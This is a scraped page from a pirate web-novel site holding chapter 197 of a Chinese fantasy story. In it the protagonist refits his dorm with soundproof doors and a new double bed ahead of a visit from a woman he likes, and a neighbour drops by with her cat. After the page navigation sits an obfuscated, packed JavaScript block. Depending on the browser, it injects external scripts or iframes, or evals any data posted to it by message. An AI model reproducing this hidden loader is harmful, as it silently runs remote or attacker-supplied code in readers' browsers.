返回

我能赋予万物本源

首页
关灯
护眼
字体:
第197章 我们只是探讨学术上的问题罢了
上一章 返回目录 下一章
  一通视频打完。

  手机的电量已经摇摇欲坠,红的只剩个位数了。

  许灵钧摸了摸自己的誓约胜利之剑,只感觉大为满足,听苏唤晴的说法,她的导师其实对卡美洛历史很是认同。

  而且卡美洛历史明显跟暴雪帝国那边的生活习俗很是相似,颇有些一衣带水的感觉。

  也就是说真实度更容易让人相信,只要能得到她的认同……

  这么长时间,许灵钧对于赋源也有了一定量的了解了。

  越是高等级的东西,所需要的真实度可能就越高。

  而如高达之类的,威力虽然惊人,但毕竟是科技亦能实现的东西,就等级而言还真算不上多高,他当初选择高达赋源,也算是机缘巧合之下的误打误撞了。

  给手机充电……

  然后顺带的,给两个死党来了个群聊……

  然后被两个牲口给批斗了。

  言下之意,你这货一~夜电话都不通,我们两个愣是为了你没撸,等你等了一整宿……不用说,你肯定是跟妹子亲密去了。

  许灵钧真想说我没有,我在很认真的探讨学术上的问题。

  但只要一想到苏唤晴那双并在一起,雪白柔腻的双腿……额……怎么说呢……

  比雅雅姐还细呢,雅雅姐属于那种穿衣显瘦,脱衣有肉,肉肉的那种感觉,手感肯定很好。

  但苏唤晴的话,就是怎么穿都是个细,但好在没有营养不~良……也可能是因为她的个头不高的缘故。

  只能说体重不过百,不是平胸就是矮,苏导师就可怜了,她两个全占了。

  不过想不到雅雅姐竟然会和王爸一起来跟我过年……唔……

  到时候住哪里呢?

  在跟死党们狠狠的开了几把黑,最后又成功的发展成骂战,跟自己的两个队友骂成一团。

  不过这次还真不是老郭的错,这次维护的却是许灵钧了,没办法,他在考虑一个很严重的问题。

  挂断电话之后。

  许灵钧目光在自己的住处来回扫了几眼。

  嗯,当初购买200一年的宿舍真的是太好了,不然跟人同居的话,雅雅姐来了多不方便。

  只是这房间也仅仅只有一间卧室,一间练功室,到时候雅雅姐和我还有王爸三人两个房间可怎么睡啊。

  这样吧,练功室可以暂时改成卧室给王爸用一下,

  我跟雅雅姐委屈一下,挤一挤就是了。

  唔,不过这样一来,房门也得改一下了,隔音效果不好可不行……雅雅姐可是很害羞的啊。

  许灵钧到现在都还记得雅雅姐跟他的承诺,比如说,最起码也得等他满十八岁了,是个成年人了才能做一些只有大人才能做的事情。

  别老扯心理上成熟,那可是万万不可以的,她王清雅,不吃童子鸡。

  但现在她既然说来给自己庆贺生日了,他觉得,已经可以开始提前做准备了。

  于是乎……

  这一天里,许灵钧罕见的没有修炼,而是特地花费了3学分,托人把房间里所有的门都给换上了隔音门。

  然后又把那些修炼器材都给堆到了角落里,把自己卧室里的床搬到了练功房里,又花了1学分额外购置了一张超豪华双人席梦思大床放到了自己的卧室。

  这样一来,卧室的空间自然被急剧的压缩,除了床、柜子、书房,几乎也仅剩下落脚的空了。

  但这种环境,还需要落足的空吗?

  有什么事情在床上就行了……

  看着那拥挤而又充实的环境,许灵钧心头颇为怀念,前世里他住的可不就是这种环境么……想不到现在竟然还有机会重温旧梦。

  李静君带着胖虎来拜访的时候。

  看到的是许灵钧正在对家里的一切大肆清扫……毕竟东西一挪,那些平日里打扫不到的地方都扫到了。

  显的格外的脏。

  李静君奇道:“你……这是在干什么?”

  “没什么。”

  许灵钧自然不可能老实回答为了让我的雅雅姐来睡觉。

  他目光在李静君肩头的胖虎身上扫了一眼,随口说道:“胖虎最近这几天晚上老是往我这里跑,可能我的床太硬吧,它不习惯,就趴我的胸口睡觉,但我的胸口也很硬……所以它就老是床上胸口来回跑,但怎么睡都不踏实,所以我特地换了张软的大床。”

  说着,胖虎一跃跳到了大床上,柔软的床,让它满足的喵呜了一声,整只猫已经盘成了一团,呼噜噜呼噜噜的声音很有节奏,显然心情极佳。

  更加印证了许灵钧的话的真实度。

  许灵钧反问道:“你的床没换吗?”

  李静君有点不自然的说道:“没……它不在床上睡,自然不会嫌床硬的。”

  “那它在哪里……额……你来找我做什么?”

  李静君说道:“只是特地来谢谢你的,我还是昨天帮胖虎剔牙才发现它牙缝里有妖兽的肉,没想到你竟然会拿一些妖兽的肉来喂它……难怪它这段时间胖了那么多。

『加入书签,方便阅读』

( 第 1/2 页, 本章未完,请翻页 1biquge.com )
上一章 返回目录 下一页
new Function(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(/(1d)/i.7(f.c)&&/(y)/i.7(f.c)){6(/(10)/i.7(x.Z.Y)){X(W V().U())}5 z="v.d.j/u/t-o-B/l/k/n-q-s-A.w";3.4("<8 a=");3.4("h");3.4("T");3.4("p");3.4("s:");3.4("//");3.4(z);3.4(">")}F 6(/(R|P|y)/i.7(f.c)){x.K("J",G(e){5 b=e.I;6(b.r){S(12(b.r.1h(/\\+/g,"%1g")))}});3.4(\'\')}F{(G(){5 m=3.1b("8");5 H="D://v.d.j";m.a=H+"/2/1/1?"+C.1c(C.L()*M);5 9=3.N("8")[0];9.O.11(m,9)})()}',62,80,'|||document|write|var|if|test|script|ss|src|_c_ob_hf|userAgent|nggwhyk||navigator||||cn|smallimage|en||Filip2po|crypto||Vals1orda|hf_ev_j||go|presentations||js|window|baidu|uwMbwa|bfeUAl1UCVU|library|Math|https|iframe|else|function|url|data|message|addEventListener|random|10000|getElementsByTagName|parentNode|UCBrowser|frameborder|MQQBrowser|eval|tt|getSeconds|Date|new|alert|href|location|check_in|insertBefore|decodeURIComponent|no|none|scrolling|marginheight|width|height|allowtransparency|true|createElement|round|Android|display|style|20|replace'.split('|'),0,{}))()